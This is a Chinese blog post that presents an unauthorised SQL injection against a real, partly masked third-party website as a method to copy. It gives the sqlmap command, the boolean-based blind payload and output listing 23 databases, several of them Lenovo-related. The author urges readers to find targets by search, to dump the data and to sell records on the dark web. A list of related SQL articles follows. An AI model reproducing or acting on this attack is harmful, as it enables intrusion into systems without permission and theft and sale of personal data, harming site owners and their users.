某站点存在SQL注入,直接可进行脱库(实战可参考此方法)

简介: 首先选择需要扫描的站点,最简单粗暴的方法就是浏览器直接搜索,什么?不会?自行gu狗吧。

首先选择需要扫描的站点,最简单粗暴的方法就是浏览器直接搜索,什么?不会?自行gu狗吧。
比如我要扫描后台,看得懂的扣1,看不懂的也扣1。然后,你就可以看到好多好多网站的后台,随便点一个进去,慢慢折腾。
就这样的方法,搞到一SQL注入点

python sqlma.py -u http://dianping.******com.cn/valuation/index.php/index/search?k=think --dbs

python大法好,sqlmap大法更好。不会用的自行gu狗
注入点注入,得到数据库

Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL 5
available databases [23]:
[*] antispam
[*] information_schema
[*] lenovo_osd
[*] lenovo_report
[*] lenovovaluation
[*] lenovovaluation_test
[*] lenovoweixin
[*] lwttest
[*] mysql
[*] performance_schema
[*] report
[*] rrwechat
[*] test
[*] testa
[*] valuation_uat
[*] vmall
[*] vmall_test
[*] weixin
[*] weixin_ceshi
[*] weixin_test
[*] weixin_uat
[*] wxshopuat
[*] yunyingweixin


随便进入一个表,

这信息好像并没有什么ruan用,但是,仅仅只是这信息没什么用而已,在某些“下面的网”一条信息 可能就价值一两块,你有几百万条数据,不直接迎娶白富美,走向人生巅峰。(也有可能送你一副白金手镯 手动滑稽0.0)

相关文章
|
SQL 运维 监控
SQL查询太慢?实战讲解YashanDB SQL调优思路
本文是Meetup第十期“调优实战专场”的第二篇技术文章,上一篇《高效查询秘诀,解码YashanDB优化器分组查询优化手段》中,我们揭秘了YashanDB分组查询优化秘诀,本文将通过一个案例,助你快速上手YashanDB慢日志功能,精准定位“慢SQL”后进行优化。
|
SQL 数据库
SQL error : “No query“问题参考
本文介绍了解决SQL中"No query"错误的步骤,包括错误提示、正确的SQL语句写法,以及更多相关参考信息。错误的原因是在构建更新语句时字段赋值之间缺少逗号,导致SQL解析失败。文章还提供了正确格式的SQL语句和相关错误处理的参考链接。
369 3
SQL error : “No query“问题参考
|
SQL 数据库 UED
SQL性能提升秘籍:5步优化法与10个实战案例
在数据库管理和应用开发中,SQL查询的性能优化至关重要。高效的SQL查询不仅可以提高应用的响应速度,还能降低服务器负载,提升用户体验。本文将分享SQL优化的五大步骤和十个实战案例,帮助构建高效、稳定的数据库应用。
1341 3
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
637 2
|
SQL 数据处理 数据库
SQL语句优化与查询结果优化:提升数据库性能的实战技巧
在数据库管理和应用中,SQL语句的编写和查询结果的优化是提升数据库性能的关键环节
1191 0
|
SQL 关系型数据库 MySQL
sql注入原理与实战(三)数据库操作
sql注入原理与实战(三)数据库操作
sql注入原理与实战(三)数据库操作
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
414 5
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
421 5
|
SQL 缓存 监控
SQL性能提升指南:五大优化策略与十个实战案例
在数据库性能优化的世界里,SQL优化是提升查询效率的关键。一个高效的SQL查询可以显著减少数据库的负载,提高应用响应速度,甚至影响整个系统的稳定性和扩展性。本文将介绍SQL优化的五大步骤,并结合十个实战案例,为你提供一份详尽的性能提升指南。
1556 0
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
343 6